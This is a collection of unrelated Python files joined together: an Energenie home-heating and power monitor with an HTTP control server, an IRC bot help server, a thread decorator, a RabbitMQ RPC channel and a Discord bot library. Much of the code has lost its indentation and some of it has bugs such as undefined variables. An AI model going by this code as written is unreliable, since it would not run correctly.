        self.lastTransitionTime=None
        self.lastPowerAboveDuty=None
        self.lastDurationBelow=None
        self.lastDurationAbove=None
def poll(self):
realPower=self.monitor.get_readings().real_power
self.powerReadings[self.powerReadingsIndex]=realPower
self.powerReadingsIndex=(self.powerReadingsIndex+1)%self.powerReadingsSize
#calculate duty cycle
powerAboveDuty=realPower>self.dutyCycleThreshold
if self.lastPowerAboveDuty!=None:
now=time.time()
if powerAboveDuty!=self.lastPowerAboveDuty:
if self.lastTransitionTime!=None:
if powerAboveDuty:
self.lastDurationBelow=now-self.lastTransitionTime
else:
self.lastDurationAbove=now-self.lastTransitionTime
self.lastTransitionTime=now
if self.lastDurationBelow!=None and self.lastDurationAbove!=None:
self.updateDuty()
# enhancement to more rapidly adapt to changes in duty
if self.lastDurationBelow!=None and self.lastDurationAbove!=None:
duration=now-self.lastTransitionTime
if powerAboveDuty and duration>self.lastDurationAbove:
self.lastDurationAbove=duration
self.updateDuty()
if (not powerAboveDuty) and duration>self.lastDurationBelow:
self.lastDurationBelow=duration
self.updateDuty()
self.lastPowerAboveDuty=powerAboveDuty
def updateDuty(self):
dutyCycle=float(self.lastDurationAbove)/float(self.lastDurationAbove+self.lastDurationBelow)
if self.dutyCycle2<0:
self.dutyCycle2=dutyCycle
else:
self.dutyCycle2=dutyCycle*self.dutyCycleFilterFactor+self.dutyCycle2*(1-self.dutyCycleFilterFactor)
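    # Worked example of the smoothing above (illustrative): with
    # lastDurationAbove=300s and lastDurationBelow=700s the raw duty cycle is
    # 300/(300+700) = 0.3; with dutyCycleFilterFactor=0.5 and a previous
    # dutyCycle2 of 0.5, the filtered value becomes 0.3*0.5 + 0.5*0.5 = 0.4.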
def updateAverage(self):
totalPower=0.0
count=0
heaterOn=0.0
for power in self.powerReadings:
if power>=0:
totalPower+=power
count=count+1
if power>self.dutyCycleThreshold:
heaterOn=heaterOn+1.0
if count>0:
self.avgPower=totalPower/float(count)
self.dutyCycle=heaterOn/float(count)
def toXMLString(self):
try:
productId=self.monitor.product_id
if productId==Devices.PRODUCTID_MIHO005:
extra="switchState='{}'".format(self.monitor.is_on());
else:
extra=""
now=time.time()
return "<{} power='{}' avgPower='{:.2f}' dutyCycle='{:.2f}' dutyCycle2='{:.2f}' volt='{}' freq='{:.2f}' age='{:.0f}' {}/>".format(
self.name,
self.monitor.get_readings().real_power,
self.avgPower,
self.dutyCycle,
self.dutyCycle2,
self.monitor.get_voltage(),
self.monitor.get_frequency(),
now-self.monitor.lastHandledMessage,
extra
)
except:
            traceback.print_exc()
return "<{}/>".format(self.name);
class Main:
def __init__(self,energenie):
self.energenie=energenie
self.kitchenPIR = energenie.registry.get("MIHO032_kitchen");
self.kitchenPIR.setCallback(PIRCallback("urn:motion:energenie1").onMotion)
self.loungePIR = energenie.registry.get("MIHO032_lounge");
self.loungePIR.setCallback(PIRCallback("urn:motion:energenie2").onMotion)
self.rad1 = Radiator(energenie.registry.get("MIHO013_rad1"),"MIHO013_rad1")
self.rad2 = Radiator(energenie.registry.get("MIHO013_rad2"),"MIHO013_rad2")
self.rad3 = Radiator(energenie.registry.get("MIHO013_rad3"),"MIHO013_rad3")
self.rad4 = Radiator(energenie.registry.get("MIHO013_rad4"),"MIHO013_rad4")
self.aquarium = EnergyMonitor(energenie.registry.get("MIHO004_aquarium"),"MIHO004_aquarium")
self.deskLight = EnergyMonitor(energenie.registry.get("MIHO004_desklamp"),"MIHO004_fridge",
dutyCycleThreshold=40, averageSamples=1440) # 4 hours
self.freezer = EnergyMonitor(energenie.registry.get("MIHO004_freezer"),"MIHO004_freezer",
dutyCycleThreshold=50, averageSamples=1440) # 4hours
#self.miho005 = EnergyMonitor(energenie.registry.get("MIHO005_something"),"MIHO005_something",
# dutyCycleThreshold=20)
def loop(self):
print "sleeping to allowing readings first"
self.energenie.loop(receive_time=10)
print "ok looping"
global stopEnergenie
lastTime=time.time()
while not(stopEnergenie):
self.energenie.loop(receive_time=10)
now=time.time()
if now-lastTime>=10:
lastTime=now
self.aquarium.poll()
self.deskLight.poll()
self.freezer.poll()
#self.miho005.poll()
stopEnergenie=False
def getData(self):
self.aquarium.updateAverage()
self.deskLight.updateAverage()
self.freezer.updateAverage()
data="<data>"
data+=self.deskLight.toXMLString()
data+=self.aquarium.toXMLString()
data+=self.freezer.toXMLString()
#data+=self.miho005.toXMLString()
data+=self.rad1.toXMLString()
data+=self.rad2.toXMLString()
data+=self.rad3.toXMLString()
data+=self.rad4.toXMLString()
data+="</data>"
return data
def getRadiator(self,radNum):
if radNum=="1":
rad=self.rad1.radiator
elif radNum=="2":
rad=self.rad2.radiator
elif radNum=="3":
rad=self.rad3.radiator
elif radNum=="4":
rad=self.rad4.radiator
else:
rad=None
return rad
def onSetRadiator(self,radNum, temp):
rad=self.getRadiator(radNum)
if rad!=None:
rad.enable_thermostat()
rad.set_setpoint_temperature(temp)
return "<div>setRadiator {:s} {:f}</div>".format(rad,temp)
def onSetRadiatorValve(self,radNum, onOff):
rad=self.getRadiator(radNum)
if rad!=None:
if onOff=="on":
rad.turn_on()
elif onOff=="off":
rad.turn_off()
elif onOff=="thermostatic":
rad.enable_thermostat()
elif onOff=="identify":
rad.set_identify()
return "<div>setRadiatorValve {:s} {:s}</div>".format(rad,onOff)
def setLegacySwitch(self,house, device, onOff):
print house, device, onOff
socket = energenie.Devices.ENER002((house, device))
if (onOff=='on'):
socket.turn_on()
else:
socket.turn_off()
return "<div>setLegacySwitch {} {} {}</div>".format(house,device,onOff)
class HTTPHandler(BaseHTTPRequestHandler):
global m
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'text/xml')
self.end_headers()
self.wfile.write(self.onGet(self.path));
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
self.wfile.write("<html><body><h1>POST!</h1></body></html>")
def onGet( self, path ):
if (path=="/data"):
#sys.exit(0)
result=m.getData()
elif path.startswith("/setRadiator/"):
tokens=path.split("/")
result=m.onSetRadiator(tokens[2],float(tokens[3]))
elif path.startswith("/setRadiatorValve/"):
tokens=path.split("/")
result=m.onSetRadiatorValve(tokens[2],tokens[3])
elif path.startswith("/setLegacySwitch/"):
tokens=path.split("/")
result=m.setLegacySwitch(int(tokens[2]),int(tokens[3]),tokens[4])
else:
result="<html><body><h1>{0}</h1></body></html>".format(path)
return result;
def cleanupGPIO():
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.IN) # Green LED
GPIO.setup(22, GPIO.IN) # Red LED
GPIO.setup(7, GPIO.IN) # CS
GPIO.setup(8, GPIO.IN) # CS
GPIO.setup(11, GPIO.IN) # SCLK
GPIO.setup(10, GPIO.IN) # MOSI
GPIO.setup(9, GPIO.IN) # MISO
GPIO.setup(25, GPIO.IN) # RESET
GPIO.cleanup()
try:
stopEnergenie=False
scriptDir=os.path.dirname(os.path.realpath(sys.argv[0]))
os.chdir(scriptDir)
energenie.init()
m=Main(energenie)
p = threading.Thread(target=m.loop)
p.daemon = True
p.start()
httpd = HTTPServer(('', 8082), HTTPHandler)
print 'Starting httpd...'
httpd.serve_forever()
except:
stopEnergenie=True
    traceback.print_exc()
raise
finally:
stopEnergenie=True
c=0
while c<10:
time.sleep(0.25)
c=c+1
energenie.finished()
cleanupGPIO()
print "finished"
|
help.py
|
"""Provide help information."""
import collections
import http.server
import threading
import jinja2
def register(bot):
threading.Thread(target=help_server, args=(bot,), daemon=True).start()
bot.listen(r'^help$', help, require_mention=True)
bot.listen(r'^macros$', help_macro, require_mention=True)
def help(bot, msg):
"""Provide a link to this help page."""
msg.respond('https://ircbot.ocf.berkeley.edu/')
def help_macro(bot, msg):
"""Provide a link to the list of macros."""
msg.respond('https://ircbot.ocf.berkeley.edu/macros')
def build_request_handler(bot):
jinja_env = jinja2.Environment(
loader=jinja2.PackageLoader('ircbot', ''),
autoescape=True,
)
class RequestHandler(http.server.BaseHTTPRequestHandler):
def render_response(self, template, **context):
rendered = jinja_env.get_template(template).render(**context).encode('utf-8')
self.send_response(200, 'Okay')
self.send_header('Content-Length', len(rendered))
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.end_headers()
self.wfile.write(rendered)
def do_GET(self):
if self.path == '/':
plugins = collections.defaultdict(set)
for listener in bot.listeners:
plugins[bot.plugins[listener.fn.__module__]].add(listener)
self.render_response(
'plugin/templates/help.html',
plugins=sorted(plugins.items(), key=lambda p: p[0].__name__),
)
elif self.path == '/macros':
self.render_response(
'plugin/templates/macros.html',
macros=bot.plugins['macros'].list(bot),
)
else:
self.send_response(404, 'File not found')
self.end_headers()
self.wfile.write(b'404 File not found')
return RequestHandler
def help_server(bot):
server = http.server.HTTPServer(('0.0.0.0', 8888), build_request_handler(bot))
server.serve_forever()
|
decorators.py
|
import functools
from threading import Thread
# Note: `async` has been a reserved keyword since Python 3.7, so the decorator
# is exposed as `run_async` to keep the module importable on current interpreters.
def run_async(f):
    """Run the decorated function in a new background thread and return the thread."""
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        thr = Thread(target=f, args=args, kwargs=kwargs)
        thr.start()
        return thr
    return wrapper
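# --- Usage sketch (illustrative, not part of the original module) -------------
# Demonstrates the decorator above; `slow_job` is a hypothetical example function.
if __name__ == "__main__":
    import time
    @run_async
    def slow_job(n):
        # Runs off the main thread once the decorator spawns it.
        time.sleep(0.1)
        print("finished job", n)
    threads = [slow_job(i) for i in range(3)]
    for t in threads:
        t.join()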
|
rpc_channel.py
|
# Copyright (c) 2019 Platform9 Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import pika
import threading
import datetime
import time
import re
from shared.constants import LOGGER_PREFIX
LOG = logging.getLogger(LOGGER_PREFIX + __name__)
class RpcChannel(object):
def __init__(self,
host,
port,
user,
password,
exchange,
exchange_type,
virtual_host="/",
application='',
connection_ready_callback=None,
connection_close_callback=None):
self._host = host
self._port = port
self._user = user
self._password = password
self._exchange = exchange
self._exchange_type = exchange_type
self._virtual_host = virtual_host
self._application = str(application)
self._connection = None
self._channel = None
self._stopping = False
self._credentials = pika.PlainCredentials(username=self._user,
password=self._password)
self._connection_parameters = pika.ConnectionParameters(host=self._host,
port=int(
self._port),
virtual_host=self._virtual_host,
credentials=self._credentials)
self._closing = False
self._connection_ready = False
# the default settings used when declare exchange:
# exchange_type='direct',
# passive=False,
# durable=False,
# auto_delete=False,
        # among them, 'auto_delete' may have a different value on the rabbitmq
        # server, so we need to handle it when the exchange declaration fails
self._exchange_auto_delete = False
# callbacks
self._connection_ready_callback = None
self._connection_close_callback = None
if connection_ready_callback and callable(connection_ready_callback):
self._connection_ready_callback = connection_ready_callback
if connection_close_callback and callable(connection_close_callback):
self._connection_close_callback = connection_close_callback
def _open_connection(self):
        LOG.debug('creating RPC pika connection to amqp://%s:***@%s:%s/ for %s', self._user,
                  self._host, str(self._port), self._application)
return pika.SelectConnection(self._connection_parameters,
on_open_callback=self._on_connection_open,
on_open_error_callback=self._on_connection_open_fault,
on_close_callback=self._on_connection_closed)
def _close_connection(self):
LOG.debug('closing RPC pika connection for %s', self._application)
self._closing = True
if self._connection is not None:
self._connection.close()
def _on_connection_open_fault(self, _unused_connection, err):
LOG.debug('error when open RPC pika connection for %s, will reopen : %s',
self._application, str(err))
time.sleep(5)
if self._connection:
self._connection.ioloop.stop()
def _on_connection_closed(self, connection, reply_code, reply_text):
LOG.debug('RPC pika connection was closed for %s', self._application)
if self._closing:
LOG.debug('stop RPC pika ioloop for %s since connection was closed.', self._application)
self._connection.ioloop.stop()
else:
time.sleep(5)
LOG.debug('RPC pika connection for %s was closed, will reopen. error : %s %s',
self._application, reply_code, reply_text)
self.close_channel()
self._connection.ioloop.stop()
def _on_connection_open(self, unused_connection):
LOG.debug('RPC pika connection opened for %s', self._application)
self._open_channel()
def _open_channel(self):
LOG.debug('creating RPC pika channel for %s', self._application)
self._connection.channel(on_open_callback=self._on_channel_open)
def close_channel(self):
LOG.debug('closing RPC pika channel for %s', self._application)
if self._channel is not None:
self._channel.close()
def _add_on_channel_close_callback(self):
LOG.debug('adding RPC pika channel close callback for %s', self._application)
self._channel.add_on_close_callback(self._on_channel_closed)
def _on_channel_closed(self, channel, reply_code, reply_text):
LOG.warning('RPC pika channel for %s was closed: %s , %s',
self._application,
str(reply_code),
str(reply_text))
# when declare exchange failed, will get error like this :
# replay_code = 406 ,
# reply_text = PRECONDITION_FAILED - inequivalent arg 'auto_delete' for
# exchange 'pf9-changes' in vhost '/': received 'false'
# but current is 'true'
if reply_code == 406:
pattern = re.compile(r".*inequivalent arg 'auto_delete' for exchange.*in vhost.*:.*received '(?P<local>\w+)' but current is '(?P<remote>\w+)'.*")
matched = re.match(pattern, reply_text)
if matched:
                local = matched.group('local').lower() == 'true'
                remote = matched.group('remote').lower() == 'true'
LOG.debug("'auto_delete' for exchange %s on rabbitmq server "
"is '%s', but we declared it with '%s'",
self._exchange, str(remote), str(local))
                if remote != self._exchange_auto_delete:
                    self._exchange_auto_delete = remote
                    LOG.debug('retry exchange declaration with auto_delete as '
                              '%s', str(self._exchange_auto_delete))
time.sleep(5)
self._setup_exchange()
return
if not self._closing:
LOG.debug('close RPC pika connection for %s since channel was closed', self._application)
self._connection.close()
else:
LOG.debug('RPC pika connection for %s already closed when channel was closed ? %s',
self._application, str(self._connection.is_closed))
def _on_channel_open(self, channel):
LOG.debug('RPC pika channel has opened for %s', self._application)
self._channel = channel
self._add_on_channel_close_callback()
# once channel is created, both producer and consumer need to declare
# exchange
self._setup_exchange()
def _setup_exchange(self):
LOG.debug('RPC pika channel is declaring exchange %s for %s', self._exchange, self._application)
try:
self._channel.exchange_declare(self._on_exchange_declare_ok,
exchange=self._exchange,
exchange_type=self._exchange_type,
auto_delete=self._exchange_auto_delete)
except Exception:
LOG.exception('unhandled exchange declaration exception for %s', self._application)
def _on_exchange_declare_ok(self, unused_frame):
LOG.debug('RPC pika channel exchange declared for %s', self._application)
try:
# call the callback if exists
if self._connection_ready_callback:
self._connection_ready_callback()
except Exception:
LOG.exception('unhandled exception from connection_ready_callback for %s', self._application)
self._connection_ready = True
def _run(self):
LOG.debug('RPC pika channel ioloop thread started for %s', self._application)
interval_seconds = 5
while not self._stopping:
if self._connection:
self._connection.close()
self._connection = None
time.sleep(interval_seconds)
try:
self._connection = self._open_connection()
self._connection.ioloop.start()
except Exception :
LOG.exception('unhandled RPC pika connection ioloop exception for %s', self._application)
LOG.debug('restart RPC pika connection for %s in %s seconds', self._application, str(interval_seconds))
self._connection.ioloop.stop()
self._close_connection()
LOG.debug('will restart RPC pika connection and ioloop for %s in %s seconds', self._application, str(interval_seconds))
time.sleep(interval_seconds)
LOG.debug('RPC pika channel IOLoop thread stopped for %s', self._application)
def is_channel_ready(self):
return self._connection_ready
def start(self):
LOG.debug('starting RPC pika channel for %s', self._application)
self._ioloop_thread = threading.Thread(name='RPCPikaIoloop', target=self._run)
self._ioloop_thread.start()
# wait for connection ready, or timeout
timeout_seconds = 120
ready = True
timeout = datetime.timedelta(seconds=timeout_seconds)
time_start = datetime.datetime.utcnow()
while not self.is_channel_ready():
time.sleep(.100)
if datetime.datetime.utcnow() - time_start > timeout:
ready = False
break
if ready:
LOG.info('RPC pika channel started for %s', self._application)
else:
LOG.warning('RPC pika channel for %s has not started in %s seconds',
self._application, str(timeout_seconds))
def stop(self):
LOG.debug('stopping RPC pika channel for %s', self._application)
self._stopping = True
self._closing = True
if self._ioloop_thread:
self._ioloop_thread.join(.100)
self._ioloop_thread = None
try:
# call the callback if exists
if self._connection_close_callback:
self._connection_close_callback()
except Exception:
            LOG.exception('unhandled exception from connection_close_callback for %s', self._application)
self.close_channel()
self._close_connection()
self._connection_ready = False
LOG.debug('RPC pika channel stopped for %s', self._application)
def get_connection(self):
return self._connection
def get_channel(self):
return self._channel
def add_connection_ready_callback(self, callback):
if not callback or not callable(callback):
            raise Exception('callback is None or not callable')
self._connection_ready_callback = callback
def add_connection_close_callback(self, callback):
if not callback or not callable(callback):
            raise Exception('callback is None or not callable')
self._connection_close_callback = callback
def restart(self):
if self._connection:
self._connection.ioloop.stop()
|
SimpleDiscord.py
|
import os
import json
import urllib3
from threading import Thread
import signal
import websocket
import time
#import zlib
from enum import IntEnum
from dataclasses import dataclass
#import io
import re
from simplediscord.utils import mylogger
# Discord opcodes
class Op_Code(IntEnum):
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
UPDATE_CLIENT_PRESENCE = 3
VOICE_STATE_UPDATE = 4
RESUME_SESSION = 6
RECONNECT = 7
GUILD_MEMBERS = 8
INVALID_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
# Discord close events
# Discord closes connection or sends invalid codes.
class Close_Event(IntEnum):
UNKNOWN = 4000
UNKNOWN_OPCODE = 4001
DECODE_ERROR = 4002
NOT_AUTHENTICATED = 4003
AUTHENTICATION_FAILED = 4004
ALREADY_AUTHENTICATED = 4005
INVALID_SEQ = 4007
RATE_LIMITED = 4008
SESSION_TIMED_OUT = 4009
INVALID_SHARD = 4010
SHARDING_REQUIRED = 4011
INVALID_API_VERSION = 4012
INVALID_INTENTS = 4013
DISALLOWED_INTENTS = 4014
Intents_Token = {
"GUILDS" : 1,
"GUILD_MEMBERS" : 2,
"GUILD_BANS" : 4,
"GUILD_EMOJIS_AND_STICKERS" : 8,
"GUILD_INTEGRATIONS" : 16,
"GUILD_WEBHOOKS" : 32,
"GUILD_INVITES" : 64,
"GUILD_VOICE_STATES" : 128,
"GUILD_PRESENCES" : 256,
"GUILD_MESSAGES" : 512,
"GUILD_MESSAGE_REACTIONS" : 1024,
"GUILD_MESSAGE_TYPING" : 2048,
"DIRECT_MESSAGES" : 4096,
"DIRECT_MESSAGE_REACTIONS" : 8192,
"DIRECT_MESSAGE_TYPING" : 16384,
"GUILD_SCHEDULED_EVENTS" : 32768
}
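# Illustrative helper (not used elsewhere in this module): shows how intent names
# combine into the bitmask that Connect() builds internally, e.g.
# _intents_bitmask(["GUILDS", "GUILD_MESSAGES"]) == 1 + 512 == 513.
def _intents_bitmask(names):
    flag = 0
    for name in names:
        flag |= Intents_Token[name]
    return flag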
_http = urllib3.PoolManager()
_token = None
_guild = None
_api = None
LOGGER_FATAL = mylogger.FATAL
LOGGER_WARNING = mylogger.WARNING
LOGGER_INFO = mylogger.INFO
LOGGER_DEBUG = mylogger.DEBUG
def Set_logger_level(level):
mylogger.level = level
@dataclass
class Connection:
ws = None
wss = None
interval = None
identified = False
_loop_heartbeat = True
_ack_heartbeat = None
commands = {}
intents_flag = 0
bot_name = None
banned_words = {}
banned_words_reaction = {}
def _Interrupt(signal, frame):
    # declare the module-level flag as global so the assignment actually stops the heartbeat loop
    global _loop_heartbeat
    _loop_heartbeat = False
data = {"op": 1000}
Connection.ws.send(json.dumps(data))
Connection.ws.close()
os._exit(0)
def _Resume(seq):
# ws.run_forever() already tries to reconnect if a connection was closed,
# so all we need is to send to the discord server is that we want to resume.
data = {
"op": int(Op_Code.RESUME_SESSION),
"d": {
"token": _token,
"session_id": Connection.session_id,
"seq": seq
}
}
    Connection.ws.send(json.dumps(data))
def _Reconnect():
# Close connection with a non-zero status code.
Connection.ws.close(status=1001)
Connection.ws = None
Connection.interval = None
Connection.identified = False
global _loop_heartbeat
global _ack_heartbeat
_loop_heartbeat = False
_ack_heartbeat = None
_Connect()
def _RequestHTTP(method, url, data=None):
headers = {
"Content-Type": "application/json",
"Authorization": _token
}
mylogger.debug("request called")
if data is not None:
mylogger.debug(f"data not None")
data_encoded = json.dumps(data)
mylogger.debug(f"data encoded {data}")
resp = _http.request(
method,
url,
headers=headers,
body=data_encoded)
return resp
else:
resp = _http.request(
method,
url,
headers=headers)
return resp
def Register(name, description, message=None, command_type=1, url=None):
mylogger.debug(url)
if url == None:
url = f"https://discord.com/api/v9/applications/{_api}/guilds/{_guild}/commands"
headers = {
"Authorization": _token,
"Content-Type": "application/json"
}
# Command with options and choices.
if type(description) == list:
data = {
"name": name[0],
"type": command_type,
"description": description[0]
}
name_index = 1
p = data
# Construct options structure.
# Only support 1 options structure for now.
for i in range(1, len(description)):
p["options"] = [{
"name": name[i],
"type": 3, # String
"description": description[i],
"required": True
}]
data = p
#p = p["options"]
name_index += 1
data["options"][0]["choices"] = []
mylogger.debug(f"{data=}")
j = 0
for i in range(name_index, len(name)):
data["options"][0]["choices"].append({})
data["options"][0]["choices"][j]["name"] = name[i]
data["options"][0]["choices"][j]["value"] = message[j]
j += 1
mylogger.debug(f"{data=}")
# Standard slash command.
else:
data = {
"name": name,
"type": command_type,
"description": description
}
data_encoded = json.dumps(data)
resp = _http.request(
"POST",
url,
headers=headers,
body=data_encoded)
resp.auto_close = False
if resp.status == 200 or resp.status == 201:
mylogger.debug(f"Successfully Registered bot command: {name}")
mylogger.debug(resp.data)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
else:
mylogger.debug(resp.status, resp.reason)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
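# Usage sketch for Register (illustrative; values are placeholders and Connect() must
# already have been called so _api and _guild are set):
#   simple slash command:
#     Register("ping", "A simple ping command")
#   command with one option and choices (the list form handled above):
#     Register(["roll", "sides", "six", "twenty"],   # command, option and choice names
#              ["Roll a die", "How many sides"],     # command and option descriptions
#              ["6", "20"])                          # choice values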
def Slash_commands(url=None):
if url == None:
url = f"https://discord.com/api/v9/applications/{_api}/guilds/{_guild}/commands"
headers = {
"Authorization": _token,
"Content-Type": "application/json"
}
resp = _http.request(
"GET",
url,
headers=headers)
resp.auto_close = False
if resp.status == 200 or resp.status == 304:
mylogger.debug("Registered bot commands:")
mylogger.debug(resp.data)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
else:
mylogger.debug(resp.status, resp.reason)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
def Change_username(username):
url = "https://discord.com/api/users/@me"
data = {
"username": username
}
resp = _RequestHTTP("PATCH", url, data)
if resp.status != 200:
mylogger.debug(resp.status, resp.reason)
mylogger.debug(resp.status, resp.reason)
# The bot will delete a message containing word(s) from the dictionary in a channel, and warn the user.
# File syntax is as follows:
# Uppercase for specifying a language.
# Lowercase adjacent to the language for words.
def Filter(file):
try:
with open(file, "r", encoding="utf-8") as f:
lang = None
for line in f:
if line[0].isupper():
lang = line.strip()
elif lang is not None and line != "\n":
if lang not in banned_words:
banned_words[lang] = [line.strip()]
else:
banned_words[lang].append(line.strip())
except FileNotFoundError:
mylogger.warning("Could not find file " + file)
def _Event_handler(ws, op_code, seq, message):
global _ack_heartbeat
if op_code == Op_Code.HEARTBEAT:
mylogger.debug("Send heartbeat")
data = {
"op": int(Op_Code.HEARTBEAT),
"d": seq
}
ws.send(json.dumps(data))
elif op_code == Op_Code.HEARTBEAT_ACK:
mylogger.debug("ACK heartbeat")
_ack_heartbeat = True
elif op_code == Op_Code.DISPATCH:
pass
mylogger.debug("Message dispatched")
elif op_code == Op_Code.RECONNECT:
_Reconnect()
elif op_code == Op_Code.INVALID_SESSION:
# Discord sends this op code if it's down, so according to the docs I should continue to heartbeat.
# This could be ambiguous and thus behave incorrectly.
mylogger.fatal("Discord is down, waiting untill it's up...")
_ack_heartbeat = True
elif op_code == Op_Code.HELLO:
mylogger.debug("Got a hello request")
def Send_heartbeat(ws, _loop_heartbeat):
while _loop_heartbeat is True:
global _ack_heartbeat
if _ack_heartbeat is None or _ack_heartbeat is True:
# Only check for ack of heartbeat if connection is established which includes sending a heartbeat once.
if _ack_heartbeat is True:
_ack_heartbeat = False
mylogger.debug("Send heartbeat interval")
data = {
"op": int(Op_Code.HEARTBEAT),
"d": seq
}
# Wait based on the interval before requesting to discord api
time.sleep(Connection.interval)
ws.send(json.dumps(data))
# Zombied or failed connection.
else:
_Reconnect()
Thread(target=Send_heartbeat, args=(ws, _loop_heartbeat)).start()
# Error messages according to Discord's api docs.
elif op_code == Close_Event.UNKNOWN:
mylogger.fatal("We're not sure what went wrong. Trying to reconnect...")
        _Resume(seq)
elif op_code == Close_Event.UNKNOWN_OPCODE:
mylogger.fatal("You sent an invalid Gateway opcode or an invalid payload for an opcode. Don't do that!")
os._exit(0)
elif op_code == Close_Event.DECODE_ERROR:
mylogger.fatal("You sent an invalid payload to us. Don't do that!")
os._exit(0)
elif op_code == Close_Event.NOT_AUTHENTICATED:
mylogger.fatal("You sent us a payload prior to identifying.")
os._exit(0)
elif op_code == Close_Event.AUTHENTICATION_FAILED:
mylogger.fatal("You sent an invalid payload to us. Don't do that!")
os._exit(0)
elif op_code == Close_Event.ALREADY_AUTHENTICATED:
mylogger.fatal("You sent more than one identify payload. Don't do that!")
os._exit(0)
elif op_code == Close_Event.INVALID_SEQ:
mylogger.fatal("The account token sent with your identify payload is incorrect.")
os._exit(0)
elif op_code == Close_Event.RATE_LIMITED:
mylogger.fatal("Woah nelly! You're sending payloads to us too quickly. Slow it down! You will be disconnected on receiving this.")
os._exit(0)
elif op_code == Close_Event.SESSION_TIMED_OUT:
mylogger.fatal("Your session timed out. Reconnect and start a new one.")
os._exit(0)
elif op_code == Close_Event.INVALID_SHARD:
mylogger.fatal(" You sent us an invalid shard when identifying.")
os._exit(0)
elif op_code == Close_Event.SHARDING_REQUIRED:
mylogger.fatal("The session would have handled too many guilds - you are required to shard your connection in order to connect.")
os._exit(0)
elif op_code == Close_Event.INVALID_API_VERSION:
mylogger.fatal("You sent an invalid version for the gateway.")
os._exit(0)
elif op_code == Close_Event.INVALID_INTENTS:
mylogger.fatal("You sent an invalid intent for a Gateway Intent. You may have incorrectly calculated the bitwise value.")
os._exit(0)
elif op_code == Close_Event.DISALLOWED_INTENTS:
mylogger.fatal("You sent a disallowed intent for a Gateway Intent. You may have tried to specify an intent that you have not enabled or are not approved for.")
os._exit(0)
def _Identify(ws):
data = {
"op": int(Op_Code.IDENTIFY),
"d": {
"token": _token,
"intents": intents_flag,
"properties": {
"$os": "windows",
"$browser": "fun",
"$device": "fun"
}
}
}
ws.send(json.dumps(data))
def _Interactions(message):
username = message["d"]["member"]["user"]["username"]
message_name = message["d"]["data"]["name"]
interaction_token = message["d"]["token"]
interaction_id = message["d"]["id"]
mylogger.debug(f"username: {username}")
url = f"https://discord.com/api/v9/interactions/{interaction_id}/{interaction_token}/callback"
mylogger.debug(message["d"]["data"]["name"])
http_resp = None
for k,v in commands.items():
if message_name == k:
mylogger.debug(f"{k=} {v=}")
if type(v) == list:
if len(v[0]) >= 4:
if v[0][0:4] == "func":
# Call the user-defined function with the message value as arguments or no arguments if @value is not defined.
ret = v[1]((v[0][4::].replace("@value", message["d"]["data"]["options"][0]["value"])))
data = {
"type": 4,
"data": {
"content": ret
}
}
else:
mylogger.fatal("Command[0] does not contain func keyword.")
break
else:
mylogger.fatal("Command[0] must contain func keyword.")
break
else:
data = {
"type": 4,
"data": {
"content": v.replace("@username", username)
}
}
mylogger.debug(f"data {data}")
http_resp = _RequestHTTP("POST", url, data)
mylogger.debug(http_resp.data)
break
if http_resp == None:
mylogger.warning("Command has not been registered.")
# This function checks the message content as opposed to its name.
# This will become a privileged intent in April of 2022 for bots that are in more than 75 servers.
# Note: the GUILD_MESSAGES intent needs to be specified when identifying to trigger this function.
def _Message_content(message):
channel_id = message["d"]["channel_id"]
username = message["d"]["author"]["username"]
content = message["d"]["content"]
message_id = message["d"]["id"]
mylogger.debug(f"username: {username}")
mylogger.debug(f"channel_id: {channel_id}")
mylogger.debug(f"content: {content}")
url = f"https://discord.com/api/v9/channels/{channel_id}/messages"
url_delete = f"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}"
data = None
for k,v in banned_words.items():
for word in v:
# Very naive checker.
if re.search(word, content.lower()):
mylogger.debug("bad word found")
mylogger.debug(f"language: {k}")
if k in banned_words_reaction:
data = {
"content": banned_words_reaction[k]
}
else:
mylogger.warning(f"Found {k} bad word, but no reaction defined.")
break
if data is not None:
http_resp = _RequestHTTP("POST", url, data)
mylogger.debug(http_resp.data)
http_resp = _RequestHTTP("DELETE", url_delete)
mylogger.debug(http_resp.data)
def _On_message(ws, message):
mylogger.debug(ws)
message_d = json.loads(message)
mylogger.debug(f"message: {message_d}")
if message_d["t"] == "READY":
global bot_name
bot_name = message_d["d"]["user"]["username"]
elif message_d["t"] == "INTERACTION_CREATE":
Thread(target=_Interactions, args=(message_d,)).start()
elif message_d["t"] == "MESSAGE_CREATE" and message_d["d"]["author"]["username"] != bot_name:
Thread(target=_Message_content, args=(message_d,)).start()
else:
op_code = None
seq = message_d["s"]
if Connection.interval is None:
if message_d["d"] is not None or message_d["d"] is not False and "heartbeat_interval" in message["d"]:
Connection.interval = int((message_d["d"]["heartbeat_interval"]) / 1000)
mylogger.debug(f"interval: {Connection.interval}")
mylogger.debug(f"seq {seq}")
# Op code will most likely always be in the response.
op_code = message_d["op"]
mylogger.debug(f"op code: {op_code}")
_Event_handler(ws, op_code, seq, message)
if Connection.identified is False:
_Identify(ws)
Connection.identified = True
        Connection.session_id = message_d["d"]["session_id"]
def _On_open(ws):
mylogger.info("Connected")
mylogger.debug(f"gateway {Connection.wss}\n")
# Error gets fired even though no errors have been found,
